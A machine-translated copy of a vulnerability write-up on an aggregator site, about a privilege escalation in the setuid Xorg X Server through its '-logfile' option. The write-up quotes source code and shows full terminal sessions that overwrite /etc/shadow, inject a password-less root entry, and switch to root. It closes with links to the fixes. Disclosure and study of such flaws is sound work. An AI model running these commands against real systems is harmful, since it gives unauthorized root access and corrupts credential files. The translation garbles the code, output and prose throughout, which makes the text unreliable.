Shulou(Shulou.com)05/31 Report--

What is the vulnerability of Xorg X Server privilege escalation? I believe many inexperienced people are at a loss about it. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Rights raising vulnerability caused by arbitrary file overwriting

Translated by Hetian Wangan Laboratory

Description:

The X.org X Server application allows low-privileged users to create or overwrite files anywhere on the system, including featured files such as / etc/shadow.

Attack condition: have console session permissions of an ordinary user

Target aircraft:

CentOS-7

[narendra@localhost] $uname-a

Linux localhost.localdomain 4.18.11-1.el7.elrepo.x86_64 # 1 SMP Sat Sep 29 09:42:38 EDT 2018 x86'64 x 86'64 xGNU/Linux

X.Org X server version: 1.19.5

Analysis:

On CentOS and RedHat server operating systems, the X.org X Server executable (/ usr/bin/Xorg) has SETUID privileges.

[Dev@localhost ~] $ls-la / usr/bin/Xorg

-rwsr-xr-x. 1 root root 2409344 Apr 11 22:12 / usr/bin/Xorg

The LogInit () function is used to log in X.org X Server applications, and X.org X Server allows users to specify log files using the "- logfile" option.

If a file with the same name as the user-provided "" already exists on the system, rename it to ".old". When this is done, a new file is created with the "" name provided by the user and called with the fopen () function

Xorg-Server/os/log.c

244 const char *

245 LogInit (const char * fname, const char * backup)

246 {

247 char * logFileName = NULL

two hundred and forty eight

249 if (fname & & * fname) {

250 if (displayfd! =-1) {

251st / * Display isn't set yet, so we can't use it in filenames yet. , /

252 char pidstring [32]

253 snprintf (pidstring, sizeof (pidstring), "pid-%ld"

254 (unsigned long) getpid ()

255 logFileName = LogFilePrep (fname, backup, pidstring)

256 saved_log_tempname = logFileName

two hundred and fifty seven

258 / * Save the patterns for use when the display is named , /

259 saved_log_fname = strdup (fname)

260 if (backup = = NULL)

261 saved_log_backup = NULL

262 else

263 saved_log_backup = strdup (backup)

264} else

265 logFileName = LogFilePrep (fname, backup, display)

266 if ((logFile = fopen (logFileName, "w")) = = NULL)

267 FatalError ("Cannot open log file\"% s\ "\ n", logFileName)

268 setvbuf (logFile, NULL, _ IONBF, 0)

two hundred and sixty nine

270logFileFd = fileno (logFile)

You can use the strace command to track the underlying open () call process of the system.

Stat ("mylogfile", 0x7ffcb9654ed0) & Nmuri 1 ENOENT (No such file or directory)

Open ("mylogfile", O_WRONLY | O_CREAT | O_TRUNC, 0666) = 4

Rt_sigaction (SIGALRM, {0x55b6e2c2ca70, [ALRM], SA_RESTORER | SA_RESTART, 0x7fb0353036d0}, NULL, 8) = 0

As you can see from the trace log, the O_EXCL flag is not set, so the fopen () function creates or overwrites existing files.

Vulnerability exploitation:

Mainly make use of the following three points:

1. The input of the fopen () call is the file name that the user can control.

2. Fopen () will create or overwrite existing files

3. Executable file / usr/bin/Xorg has setuid permission

/ etc/shadow file override test

[Dev@localhost] $uname-r

3.10.0-862.el7.x86_64

[Dev@localhost ~] $Xorg-version

X.Org X Server 1.19.5

Release Date: 2017-10-12

X Protocol Version 11, Revision 0

Build Operating System: 2.6.32-696.18.7.el6.x86_64

Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 # 1 SMP Wed Mar 21 18:14:51 EDT 2018 x86 million 64

Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8

Build Date: 13 February 2018 02:39:52PM

Build ID: xorg-x11-server 1.19.5-5.el7

Current version of pixman: 0.34.0

Before reporting problems, check http://wiki.x.org to make sure that you have the latest version.

[Dev@localhost]

[Dev@localhost ~] $id

Uid=1000 (Dev) gid=1000 (Dev) groups=1000 (Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[Dev@localhost ~] $

[Dev@localhost ~] $cd / etc

[Dev@localhost etc] $ls-la shadow

-. 1 root root 1650 Oct 6 05:03 shadow

[Dev@localhost etc] $

[Dev@localhost etc] $cat shadow

Cat: shadow: Permission denied

[Dev@localhost etc] $

[Dev@localhost etc] $Xorg-logfile shadow: 1 # specify the log file as shadow

X.Org X Server 1.19.5

Release Date: 2017-10-12

X Protocol Version 11, Revision 0

Build Operating System: 2.6.32-696.18.7.el6.x86_64

Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 # 1 SMP Wed Mar 21 18:14:51 EDT 2018 x86 million 64

Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8

Build Date: 13 February 2018 02:39:52PM

Build ID: xorg-x11-server 1.19.5-5.el7

Current version of pixman: 0.34.0

Before reporting problems, check http://wiki.x.org to make sure that you have the latest version.

Markers: (-) probed, (* *) from config file, (= =) default setting

(+) from command line, (!) Notice, (II) informational

WW) warning, (EE) error, (NI) not implemented, (?) Unknown.

(+) Log file: "shadow", Time: Sat Oct 6 21:54:13 2018

(=) Using config directory: "/ etc/X11/xorg.conf.d"

(=) Using system config directory "/ usr/share/X11/xorg.conf.d"

^ Cerror setting MTRR (base = 0x00000000e0000000, size = 0x01700000, type = 1) Invalid argument (22)

(II) Server terminated successfully (0). Closing log file.

[Dev@localhost etc] $

[Dev@localhost etc] $

[Dev@localhost etc] $ls-la shadow

-rw-r--r--. 1 root Dev 53901 Oct 6 21:54 shadow

[Dev@localhost etc] $

[Dev@localhost etc] $head shadow # written successfully

[11941.870]

X.Org X Server 1.19.5

Release Date: 2017-10-12

[11941.870] X Protocol Version 11, Revision 0

[11941.870] Build Operating System: 2.6.32-696.18.7.el6.x86_64

[11941.870] Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 # 1 SMP Wed Mar 21 18:14:51 EDT 2018 x 86 million 64

[11941.870] Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8

[11941.870] Build Date: 13 February 2018 02:39:52PM

[11941.870] Build ID: xorg-x11-server 1.19.5-5.el7

[11941.870] Current version of pixman: 0.34.0

[Dev@localhost etc] $

Privilege promotion

[Dev@localhost ~] $id # current permissions

Uid=1000 (Dev) gid=1000 (Dev) groups=1000 (Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[Dev@localhost ~] $

[Dev@localhost ~] $cd / etc

[Dev@localhost etc] $

[Dev@localhost etc] $ls-la shadow

-. 1 root root 1241 Oct 10 01:15 shadow

[Dev@localhost etc] $

[Dev@localhost etc] $cat shadow # View permission

Cat: shadow: Permission denied

[Dev@localhost etc] $

[Dev@localhost etc] $Xorg-fp "root::16431:0:99999:7:::"-logfile shadow: 1 # write to the file, root has no password

X.Org X Server 1.19.5

Release Date: 2017-10-12

X Protocol Version 11, Revision 0

Build Operating System: 3.10.0-693.17.1.el7.x86_64

Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 # 1 SMP Wed Sep 26 15:12:11 UTC 2018 x86 million 64

Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.14.4.el7.x86_64 root=/dev/mapper/centos-root ro crashkernel=auto rd.lvm.lv=centos/root rd.lvm.lv=centos/swap rhgb quiet LANG=en_US.UTF-8

Build Date: 11 April 2018 04:40:54PM

Build ID: xorg-x11-server 1.19.5-5.el7

Current version of pixman: 0.34.0

Before reporting problems, check http://wiki.x.org

To make sure that you have the latest version.

Markers: (-) probed, (* *) from config file, (= =) default setting

(+) from command line, (!) Notice, (II) informational

WW) warning, (EE) error, (NI) not implemented, (?) Unknown.

(+) Log file: "shadow", Time: Wed Oct 10 01:16:10 2018

(=) Using config directory: "/ etc/X11/xorg.conf.d"

(=) Using system config directory "/ usr/share/X11/xorg.conf.d"

^ Cerror setting MTRR (base = 0x00000000e0000000, size = 0x01700000, type = 1) Invalid argument (22)

(II) Server terminated successfully (0). Closing log file.

[Dev@localhost etc] $ls-la shadow

-rw-r--r--. 1 root Dev 53897 Oct 10 01:16 shadow

[Dev@localhost etc] $

[Dev@localhost etc] $cat shadow | grep "root::" # written to the file successfully

Root::16431:0:99999:7:::

[Dev@localhost etc] $

[Dev@localhost etc] $

[Dev@localhost etc] $su # switch to root user

[root@localhost etc] #

[root@localhost etc] # id # View permissions, rights raised successfully

Uid=0 (root) gid=0 (root) groups=0 (root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Repair information:

Https://lists.x.org/archives/xorg-announce/2018-October/002927.htmlhttps://lists.x.org/archives/xorg-announce/2018-October/002928.html

After reading the above, have you mastered the method of Xorg X Server privilege escalation vulnerability? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.